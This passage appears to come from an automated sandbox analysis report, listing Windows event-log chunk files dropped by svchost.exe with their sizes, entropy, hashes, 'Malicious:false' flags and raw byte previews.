                                                        Preview:ElfChnk.........?...............?...................<.md.....................................................................?.Q................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A......&...................................**..x...........,.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):4.634418630947688
                                                        Encrypted:false
                                                        SSDEEP:768:/VQ+uYvAzBCBao/F6Cf2SEqEhwaK41HZaUeI36ISKEeKRe:cH
                                                        MD5:A00BAFFCABB00428EA0512FCECCC55E5
                                                        SHA1:19F7C942DC26C3FF56D6240158734AFF67D6B93E
                                                        SHA-256:92264C9E28AB541669DED47CFAF1E818EBD863FA9E8FC6B0F52175D694A9E0D9
                                                        SHA-512:DF94AA8FA0610A0EFE7BAC0DB2A01645A4CD1C7FAD62E914EF914B526B651ED62600F63909D26149FD17C259348DADE05F48759B1DF092970251DB86690CC2B6
                                                        Malicious:false
                                                        Preview:ElfChnk.........m...............m.....................]......................................................................p.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................................%0......**..@...........WW. ..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):2.0646587531847893
                                                        Encrypted:false
                                                        SSDEEP:384:eh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzDK:eMAP1Qa5AgfQQgniwS
                                                        MD5:399CAF70AC6E1E0C918905B719A0B3DD
                                                        SHA1:62360CD0CA66E23C70E6DE3340698E7C0D789972
                                                        SHA-256:FD081487CCB0ACEAD6F633AADBA4B977D2C9360CE8EAC36EAB4E3C84A701D849
                                                        SHA-512:A3E17DA61D4F7C0C94FD0B67707AE35250656842D602906DE515B5E46ECD5078AC68AE607B99DC1A6061B0F896759FE46FF8EE350774205635D30363D46939EA
                                                        Malicious:false
                                                        Preview:ElfChnk......................................g...j..%s.g........................................................................................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................................&...........c..;...............................**..x...........HD................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):4.4364303862010575
                                                        Encrypted:false
                                                        SSDEEP:384:PhrE2E+EAsbE3VgEWsUiEcEf4eEOhEmELVFEEE5ejElEreEFEzEAEWE+EWEeEKEy:P3sleByhfIwPGa1SEzy
                                                        MD5:2BB73ACC8F7419459C4BF931AB85352C
                                                        SHA1:F1CE2EB960D3886F76094E2327DD092FC1208C7E
                                                        SHA-256:1969400F6FC72AD4A41092FEC53A19078C98DE9FCB2507A3BD8E1930B2447B62
                                                        SHA-512:7D882184DA11B490E111502C8193B73248259D43CC5DCE021CD7264212F1BCD3D62F2A3A2F86929663E2E904961D4F1E406E314020FE904D41694A09C1EB0457
                                                        Malicious:false
                                                        Preview:ElfChnk.p...............p..................../...1..V......................................................................H...................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................m................*..............%................ ..................&............0......................**......p..........T..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):3.0631557320109892
                                                        Encrypted:false
                                                        SSDEEP:384:xhYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3KlZ:x1T4hGvj
                                                        MD5:86AEA3A9CA3E5909FD44812754E52BD6
                                                        SHA1:F79B583F83F118AC724A5A4206FC439B88BB8C65
                                                        SHA-256:2AB21F158F9FFA0A375B2ABBD58880A732FABBC436246D40A68DD88D324428C9
                                                        SHA-512:17796DAA6BCE3C6B7EBACD2A683D085AB08C7701DB5FF91DC2D6531E9CC23FCFC52650A6CD02D8B54D4E8C8D5B59DB1688E18571587E0431E4AA914086BE26F5
                                                        Malicious:false
                                                        Preview:ElfChnk.........b...............b...............0...o5@r.....................................................................2..................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../.......................**............... .$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):2.4467272005363894
                                                        Encrypted:false
                                                        SSDEEP:384:EEhFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjD6:JzSKEqsMuy6TN
                                                        MD5:155681C222D825199B738E8DEC707DC8
                                                        SHA1:704C800E7313F77A218203554E1428DF2819BC34
                                                        SHA-256:1505E543085CB6AA30119F10DF11AC8CE061DB0CAC6D44A640E711F96750C4BF
                                                        SHA-512:ADDDE8E26D330EAA13F993D17FF4A6DE7F4120E5B36205EB69FC999B0462B21FD189317EFD1002618551EE24E5C753A09EB34955E8CF1A8E2A22D27516BAB720
                                                        Malicious:false
                                                        Preview:ElfChnk.........L...............L...........x.......ZZO.........................................................................................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................=............................................y..................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):2.156155224835584
                                                        Encrypted:false
                                                        SSDEEP:384:MhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3zE:Mmw9g3LU
                                                        MD5:F22AC858C2ACC96E8F189E43FFE46FBD
                                                        SHA1:540B8276921D37FCFFDA3FC7BCFAE1D99A85433B
                                                        SHA-256:771A6E4098CB30081338F06DD7C0B54248C133F9B7B6849FDADDBD6E6FD5BCE9
                                                        SHA-512:B4CF3C51B9FB236207B19FE697CEF6E402C6C903E7570B3938F529E5438F96E230463B9A9B17784A98E580E2B18AA9626E96AA83F705D506AF9C2A0432F0F7D5
                                                        Malicious:false
                                                        Preview:ElfChnk.........6...............6........... o...p..k.?........................................................................x................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n.......#...........................................~i..................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):1.9197999988543422
                                                        Encrypted:false
                                                        SSDEEP:384:ehqID7I26vIxIPIttIo0IPrI5IMILIjI7I1IIIfrIBBLIgITI:ecx
                                                        MD5:6C3F290FC62CFA9C240AEE8DB1DBA277
                                                        SHA1:CFACCF81F3AA31E8DE85CEAFDAA55AA90FA18BEC
                                                        SHA-256:7841FBB35636229AFB0389965D3DDBD0B7DF4858F1DA8A8FF434830DB8B133D6
                                                        SHA-512:D2C60875EFADB1F3421CDC095B00E32419C0266CB4F58B17AF09A82AAA20EB488C757BA07E7562A033B84A37B3E035C405200BFB29330F79CA565FF21F5EDA88
                                                        Malicious:false
                                                        Preview:ElfChnk.K.......L.......K.......L...........x...86.....U......................................................................+.................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..x...K.........tQ..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):5.718426658668259
                                                        Encrypted:false
                                                        SSDEEP:384:Thka5Ka5WsR9o2KbzyzIz7a5NsR9o2KbzyzIzia5zzuzNz0zxzuewKWMK/2a55wt:Tdqlt94xODljQdM
                                                        MD5:8630011707C7BFBCECC0A9430637802E
                                                        SHA1:22247A5B6A4C01883BB14E0BD4575A3553F945CB
                                                        SHA-256:227057F9899098B21709D53114E9DECFFCD28207BFFA178AD6B1E32F9C63EDDF
                                                        SHA-512:972629871B28EA6D01B8762B28378F8348E592BD465FE7FD1CF6AB5BD62157230AD3BB729F6290F6EDA950AB20598110676D902756E40BA3067ED37831855076
                                                        Malicious:false
                                                        Preview:ElfChnk.%......./.......%......./...........(l...n.........................................................................b\.;................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&........................6..........**..P...%.......'wu~..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):0.9963080376858662
                                                        Encrypted:false
                                                        SSDEEP:384:l7h1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMLaMA0MJvMZy:l7eJw
                                                        MD5:A51AFE78FA4481FA05EDC1133C92B1D8
                                                        SHA1:5BA44E7A99EE615E323696742DA6B930E9FF6198
                                                        SHA-256:44C1977D16383DF6B1FFF8164F319DFD99092A124ABA7C7280D74A6BB8AD2094
                                                        SHA-512:792E5E8F5540DCA4B7F003C1043DCBC3E0EC3F23EC4A7B0FA84357F6ABDFD84122C124DBEA2B61D3B5CEED79A3E158DBE95DFCDB20EEAC433D9CDC29C3328F22
                                                        Malicious:false
                                                        Preview:ElfChnk......................................)..0-....\.....................................................................|..........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................................................................)..................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):4.076996627399968
                                                        Encrypted:false
                                                        SSDEEP:384:Ihk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS12:IBjdjP0cs6N
                                                        MD5:A8ADBDC2B39B55444B2C844F7D81EBDE
                                                        SHA1:F97F40E314C8A2A39953A28CB72C9270D3073418
                                                        SHA-256:93CF0EF4C121FCBB18A8A6DA5912415AF1113816BE6A8F9B86BE6A2243408E09
                                                        SHA-512:922D165CBE871A393D58DAABABE7D09557E242BF73C2C473C29CCB0FB3277B8119911EFF51B12238D23B613AD9C15DAB163C9757BC9006D768B2345F53436E7B
                                                        Malicious:false
                                                        Preview:ElfChnk.........................................X...Y}.......................................................................(.[................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................A.......................................................**..............*5.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):3.2270516322734055
                                                        Encrypted:false
                                                        SSDEEP:384:khhDIEQAGxIHIFIWInIfEITQIAIQIfID8IaxIcI8IfRITGIHUI6IwI2IVIWIfRGQ:khZxGp969
                                                        MD5:2DB9B1A1F02360FE513803E6301D6579
                                                        SHA1:793571D3F7152764B6D42420CA8591EADEC753A1
                                                        SHA-256:054197E1C5C406838B73973BDD7E205150D4EB4D2EB81C003B6550616AF59E84
                                                        SHA-512:5B7A6B93CC053E90252012119D0C341D7512B7716F566757849E06625AE9762AB159ADD3C54A2B76C45FCF1741717092AD6BDB7F0E3BC8550B95D08C44B9D590
                                                        Malicious:false
                                                        Preview:ElfChnk.T...............T...................P...h...P................................................................................................................>...=...........................................................................................................................f...............?...........................m...................M...F............................................................n..................1................................a......a...........................**......T.......B..d..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):0.801423310886069
                                                        Encrypted:false
                                                        SSDEEP:384:dh6iIvcImIvITIQIoIoI3IEIMIoIBIDIcIwISIEzIJVI:doxJS
                                                        MD5:9EAAD7982F42DFF47B8EF784DD2EE1CC
                                                        SHA1:542608204AF6B709B06807E9466F7543C0F08818
                                                        SHA-256:5468A48533B56DE3E8C820B870493154775356CE3913AD70EC51E0D1D0D1A366
                                                        SHA-512:036BFABE2AC4AD623B5C439349938C0EA254BFCDAB9096A53253189D4F632A8A8A1DD00644A4573AF971AAEA6831317BFD663E35363DD870684CDD4C0A51884C
                                                        Malicious:false
                                                        Preview:ElfChnk.....................................X ...#..\.N......................................................................12.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................~ ..................................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):2.996272372482282
                                                        Encrypted:false
                                                        SSDEEP:768:e4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH137:M
                                                        MD5:4F68D6AF0C7DB9E98F8B592C9A07811C
                                                        SHA1:9F519109344DD57150F16B540AAA417483EF44FE
                                                        SHA-256:44177E6F71E240EBFE9CE63FEFBF5D46A01979E09C0C14F65F1D19AE8E97B8EE
                                                        SHA-512:E1D5097BCD572F3DBAF4024FAEA76BAD3061CD2E05017701B578020327969C2BD3F725FBE8BFE4C40DC66336CE1371E7AB037058603B02449366DAE4EDE8DE69
                                                        Malicious:false
                                                        Preview:ElfChnk.....................................(...8...S......................................................................V..C................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ..................................................N...................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):4264
                                                        Entropy (8bit):4.187102023329358
                                                        Encrypted:false
                                                        SSDEEP:96:ka/tuKNVaO80o1nyA2WyfWy0fyXY9yu/Ny/:Ltu8V7wnyA2WyfWy0fyXY9yu/Ny/
                                                        MD5:1CAF0497C7439ABC5852A45274FB411A
                                                        SHA1:5C6D01541991D9CC55B85F6EAAD5A96859315B29
                                                        SHA-256:D839376EECFF56B80407B6A8A2942E38919FDAF04015866481DC1C7AD093771F
                                                        SHA-512:F9D9362961367928B0034A6FF8E56D800C3F3B150F22D5BE7F49D92BF8AFF830D4947BB19E36B8203F4CFDA2331F2DE74615C7E4EF8EF77BF3709FF919B0C61B
                                                        Malicious:false
                                                        Preview:ElfChnk.................O.......T...........0........~ .........................................................................................0...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..`...O........6..\M............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):4.739533853103722
                                                        Encrypted:false
                                                        SSDEEP:384:jh+rKvKaKNP6WKkvKWKlpKuyK7YKmKaKHxqKWyK11KUIKqKq9KLjK5yKoKfKYKnb:jkN2cTOsK+C2qNLwziOr9NrjzDbRt
                                                        MD5:55E0313A260959DFBBF0CD2B7283EBEB
                                                        SHA1:887EDDBD0ECD8357F09BC7C7A7776EE6C24D5E05
                                                        SHA-256:8294E68932AA52FC34777DCB2278F737E1BB8AD2624918642F1BEEC2F9C8A13C
                                                        SHA-512:86596B26D669CD4CB9887595013F57EA5C084E86AD90EF35E4BFB7882932CB051C1A109F0C76DB52F15B2ABA130C605CEA27B116AA452D5972DEAA477D74FB57
                                                        Malicious:false
                                                        Preview:ElfChnk......................................... ...........................................................................29j.................l...........................=...........................................................................................................................f...............?...........................m...................M...F.......................E................................M..&...g`..g5......................o]...........X...Z..GP...............s......od......_i..**..P............%.o..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):0.7590316238843728
                                                        Encrypted:false
                                                        SSDEEP:384:IhP8o8Z85848V8M8g8D8R8E8T8h8p8TtP8sU8:Ic
                                                        MD5:B074238315662886E2BD70106D08A747
                                                        SHA1:5ADA158D19401565E76349FCA97489E9FB9BFA36
                                                        SHA-256:53770508DCDA0199A75458B5A10DC8FD2E49A4CFD0FC001C16D56F3B567AB71C
                                                        SHA-512:9D35DC04CCE95541551254BCBB00B0E2E0860D9B6F69D40FBC829DA31FC3AC43690A049A432BA4D43315B80675143A6AA02C57484E7903845010A5AD9EC92D6D
                                                        Malicious:false
                                                        Preview:ElfChnk.........................................0!....H.......................................................................j........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................................................................................**..(.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):3.751304651738097
                                                        Encrypted:false
                                                        SSDEEP:1536:JXhaUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:JXwnS
                                                        MD5:DBDD49092AAB51CA8C9DE47231576C1C
                                                        SHA1:B351D8EB098AEC7B0F5C7FBF99D56E844ADA80BA
                                                        SHA-256:61D06748F842579D81ACCE00FEAFE9D57B5802C266DD1D8F851CB6900FE74C48
                                                        SHA-512:59A93EB7ED5A9FC2AFB33EFF53A29178B907594DFB5CA00D79EA649226B35F24A0A017C6DFE31553CE8F1FF99AFE06E2583950C94FE56E69A0E29EDBFE04AEF7
                                                        Malicious:false
                                                        Preview:ElfChnk.........%...............%............E..`G..-........................................................................)^u................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................&B..........O.......................**..............g5...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):2.3069197485541766
                                                        Encrypted:false
                                                        SSDEEP:768:S0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9O0apPaQOan6qa6IvV1:ycEu
                                                        MD5:E6E4C860CE7DD1BB499D6A082B461B90
                                                        SHA1:11330861B23B1D29D777D9BD10619A07B6A6A9C0
                                                        SHA-256:C27431D9C64F5C9D323E2B4ED5F44781969B34F30DC4280296A329DCD6509D44
                                                        SHA-512:7393A0FF290BB3DB07E8BB9A9FA7B666CD8B686CBDAA3FED2EBD704D6E88A4D5768D104BD768E6AA533C42588C661A863E11ED9146ABD7386A2A9B4F84583406
                                                        Malicious:false
                                                        Preview:ElfChnk.........;...............;............r..@t...H......................................................................p"..................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F...........................*...........&........................................................................l..............]...................**.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):3.8593445672690927
                                                        Encrypted:false
                                                        SSDEEP:384:ahHBiQk1bdzpFEVQCd3iDzJiLQKiDBi4k1bdzpFEVQ35yY3dik5pmik5pbik5pKU:ah0w+qLpBVi7CPME79nCxkSq
                                                        MD5:5AE0C3F2DDDBD1C231ABBE6B13B712DF
                                                        SHA1:E337AC48B8A0192A9C09C2B747AF2BB52DCA67E7
                                                        SHA-256:B9CD7A241840A211B585113857AC9B56BC631423B61E12F300050F79815BCAD8
                                                        SHA-512:3C7CA015F3834519AD1AC4881D649B2065858B1368C2CFC590C50DF695F09B5C4AE7CD435F76D032A9978772B79F945706B21802172B33E0AD6847763048BEE5
                                                        Malicious:false
                                                        Preview:ElfChnk.........#...............#........... ..............................................................................\.*f................T.......................|...=...........................................................................................................................f...............?...........................m...................M...F.......................................-...'...............&.......................................................................................**.. ............#................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):4.2909571978750325
